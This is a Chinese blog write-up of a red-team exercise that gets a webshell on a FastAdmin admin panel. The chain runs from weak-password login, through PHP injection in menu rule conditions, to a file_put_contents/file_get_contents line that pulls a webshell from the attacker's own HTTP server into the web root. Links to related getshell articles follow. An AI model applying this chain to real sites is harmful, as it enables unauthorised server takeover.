记一次FastAdmin后台Getshell

最新推荐文章于 2024-04-15 09:34:31 发布
最新推荐文章于 2024-04-15 09:34:31 发布
阅读量5k 收藏 4
点赞数 1
分类专栏: 笔记 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45244158/article/details/125506995
版权

文章目录

一、FastAdmin 介绍

FastAdmin 是基于ThinkPHP5和Bootstrap的极速后台开发框架。 基于ThinkPHP行为功能实现的插件机制,拥有丰富的插件和扩展,可直接在线安装卸载 。 基于完善的Auth权限控制管理、无限父子级权限分组、可自由分配子级权限、一个管理员可同时属于多个组别 。

二、测试过程

在某次HVV的打点过程中,发现某资产为FastAdmin搭建。
下图为FastAdmin的报错页面,根据经验可判断该网站为FastAdmin搭建。
image.png

输入admin.php进入后台登录页面,弱口令进入后台。
image.png
image.png

进入后台找功能点getshell。后台默认会有插件管理功能,但是我们在后台没有找到这个功能,我们直接访问插件管理的地址
插件管理地址: /admin/addon?ref=addtabs
image.png

理论上离线安装 Fileix文件管理器 ,然后上传一句话木马就可以getshell,但是很可惜失败了。
image.png

接着翻后台,发现有定时任务功能,尝试反弹shell,写入反弹shell的语句后,在服务器上nc监听等待回连,但是发现并没有执行。
image.png

后面一看之前管理员设置过的定时任务也没有执行过,失败!
image.png

继续翻后台,发现在菜单规则中可以创建规则条件,尝试在功能点中写入phpinfo()
必须写在权限管理中!!!
image.png

然后来到管理员管理中,添加一个管理员。
所属组别必须为二级管理员组!!!
image.png

添加完成之后,重新用新添加的账户登录后台,可以发现phpinfo()被成功执行。
image.png

通过搜索$_SERVER[‘DOCUMENT_ROOT’]获取网站根目录,为/www/wwwroot/xxxxxxxxx/
image.png

找到根路径后注销账户,准备一个webshell木马名为1.php,放在自己的服务器上,使用python启动一个临时web。

python3 -m http.server 8080

image.png

在回到管理后台当中,在同样的位置写入如下语句,将远程服务器的webshell木马下载到网站根目录。

file_put_contents('/www/wwwroot/xxxxxxxxx/shell.php',file_get_contents('临时web地址/1.php'))

image.png

保存完成后,再次使用刚才新创建的用户登录
image.png
image.png

webshell木马已被成功写入。
image.png

三、总结

在打点过程中, 通过指纹识别软件进行指纹识别进行相应的漏洞利用,在未识别出指纹的需人工判断,根据报错页面的样式识别指纹一种较好的方法。
整体打点过程:浏览网站—>发现报错页面指纹为FastAdmin—>通过弱口令进入后台—>规则条件中写入phpinfo()—>获得网站根目录—>规则条件中写入webshell

culprits
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Fastadmin后台插件-在线命令管理-getshell
千寻的博客
05-09 3575
注意:需要登录账号或者自己上传一个压缩包,存在漏洞的版本是1.1.0,经过测试1.1.1的已经对输入的进行过滤。我们在接口生成文件处填入 php 的文件名,在文档标题处填入 php 文件。插件管理–在线命令管理—的插件可以直接命令执行。第一步 先上传一个phpinfo,提示成功。第二步 上传一个eval。
getshell思路
Bu2n的博客
02-23 5702
getshell能干嘛文件上传getshell文件包含getshellsql注入getshell操作系统漏洞getshellRCE getshell总结 授人以鱼,不如授人以渔 getshell能干嘛 1.执行终端命令 2.文件管理(增删改查) 3.数据管理(增删改查,前提找到root用户密码) 文件上传getshell 网站有上传点,最容易getshell。 直接上传一个一句话木马,然后使用webshell管理工具,就能成功getshell 如果web应用对上传文件的文件进行过滤,要想办法绕.
一次简单的诈骗网站Getshell
qq_35897989的博客
01-14 57
前言:在放假期间接到一个诈骗电话、然后说京东金条利率过高让我处理下(在疫情开放期间京东客服基本上是没有人工客服),然后就慢慢的被拉入钉钉会议,然后骗子给网站的时候发现域名不对就判定成了骗子就找理由有事退出了会议。 0x00信息收集 。 通过域名可以判断出这个不是正规的政府网站这是一个伪造的,在里面骗子为了保证能够完全达到欺骗用户的目的其他的栏目以及点击跳转到的都是真实的链接 但是在在线服务这...
FastAdmin: 一款基于ThinkPHP+Bootstrap的极速后台开发框架(Gitee最有价值开源项目)
最新发布
chenchuang0128的博客
04-15 1441
随着Web技术的快速发展,后台管理系统的开发效率与灵活性成为了项目成功的关键。FastAdmin作为一款基于ThinkPHP和Bootstrap的开源后台框架,凭借其一键生成CRUD、强大的权限管理以及丰富的插件生态,成为众多开发者的首选。本文旨在深入探讨FastAdmin的技术特点、应用实践及其在行业中的价值。一、引言随着互联网的深入发展,后台管理系统在Web应用中的作用日益凸显。快速、稳定、易扩展的后台框架成为开发者追求的目标。
FastAdmin前台分片传输上传文件getshell
自强不息
10-14 899
道虽远,行则易至;儒虽难,坚为易成
fastadmin前台分片漏洞
Fiverya的博客
12-05 2905
参考链接:fastadmin安装fastadmin安装前台分片漏洞复现:https://blog.csdn.net/weixin_43288600/article/details/121192252https://blog.csdn.net/u013921288/article/details/117670844https://xz.aliyun.com/t/9395FastAdmin最新RCE漏洞复现https://www.secpulse.com/archives/157307.html搭建好环境后,查
一次tp5.0.24 getshell1
08-03
一次tp5.0.24 getshell1
fastadmin 安装注意事项
ZJQ的博客
09-07 3964
目录 安装phpstudy​ phpstudy 站点配置 访问配置界面 https://www.bilibili.com/video/BV1Ji4y1V7ZV?p=4&spm_id_from=pageDriver phpstrom简介  PHP即“超文本预处理器”,是一种通用开源脚本语言。而PhpStorm 是 JetBrains 公司开发的一款商业的 PHP 集成开发工具。所以phpstrom是用来开发php程序的代码编辑器。   PhpStorm 是 Jet...
DEDECMS5.7后台getshell1
08-03
DEDECMS 5.7后台Getshell漏洞是近期爆出的一个漏洞,该漏洞允许攻击者在DEDECMS 5.7后台上传恶意文件,从而获取服务器的控制权。下面我们将对这个漏洞进行深入分析。 漏洞成因 该漏洞的成因是DEDECMS 5.7后台在上...
DolphinPHP 1.4.2(_1.4.5)后台 GetShell1
08-03
废话少说本地搭建完成后,先进后台上传图,进抓包可以看到访问路径为 /admin/attachment/upload/dir/images/module/admi
FastAdmin 用户权限RCE.md
04-26
FastAdmin 用户权限RCE
dz 所有版本后台GET SHELL1
08-08
论坛系统在不同版本中存在的后台GET SHELL漏洞,以及如何利用这些漏洞获取WebshellWebshell是指攻击者在目标服务器上上传或创建的一个后门程序,允许远程控制服务器。 1. **Discuz! 6.0 和 Discuz! 7.0 漏洞利用*...
gentlexue#POC-3#Discuz 3.4 最新版后台getshell1
07-25
Discuz 3.4 最新版后台getshell详情可以看这篇文章:
C#如何获取项目的根目录
米刀文
11-02 1万+
编写程序的时候,经常需要用的项目根目录。自己总结如下  1、取得控制台应用程序的根目录方法       方法1、Environment.CurrentDirectory 取得或设置当前工作目录的完整限定路径       方法2、AppDomain.CurrentDomain.BaseDirectory 获取基目录,它由程序集冲突解决程序用来探测程序集   2、取得Web应用程序
【网络安全一次挖洞的日常
kali_Ma的博客
09-07 2224
前言:上个月月初开始,在那些项目结束之后进入了挖洞时期,每天的日常工作就是挖洞,除非有临时的项目才会停下,最近在整理报告,发现了这个站,还是挺有意思的。 信息收集 从fofa上找到了这个站点,叫做fastadmin,是基于Thinkphp5和bootstrap开发的后台框架,常规思路找一下后台,根据经验,没意外的话php的站点基本都是根路径后加个admin就可以找到了 getshell 常规手段弱口令先打一波,不行再试试SQL注入 弱口令admin/123456成功进入后台 因为结合了tp5框架,想到可能
fastadmin 后台开发实例技巧
路易拉菲的博客
05-08 1150
在前后端分离项目 图片需要加上 域名的情况下可使用 echo cdnurl($image,true); 表格增加操作按钮 ajax 和 dialog 可以直接使用{字段}来进行查询操作 bt-ajax 为 ajax请求 dialog为弹出框内容 { field: 'operate', title: __('Operate'), table: table, events: Table.api.events.operate, buttons:[ { name:
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2260
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
后台getshell常用技巧
热门推荐
黑面狐
04-03 1万+
1.利用文件上传漏洞,找文件上传处想办法上传php文件。 一些网站在设置可以允许修改上传的文件类型则直接添加php 有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过 很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况 这种情况直接上传一个.hatccess文件覆盖这个,让其失效。 或者上传不重命名的...
低权限后台getshell是微擎cms存在的后台漏洞吗
06-06
微擎CMS存在一些后台漏洞,但是不是所有的漏洞都能导致低权限后台getshell。一些漏洞可能只能导致信息泄漏、XSS等安全问题,而无法实现getshell。如果您想了解具体的微擎CMS后台漏洞信息,建议查阅相关安全研究报告或者官方公告。同时,为了保障您的网站安全,建议您及时升级微擎CMS到最新版本,并加强网站的安全防护措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值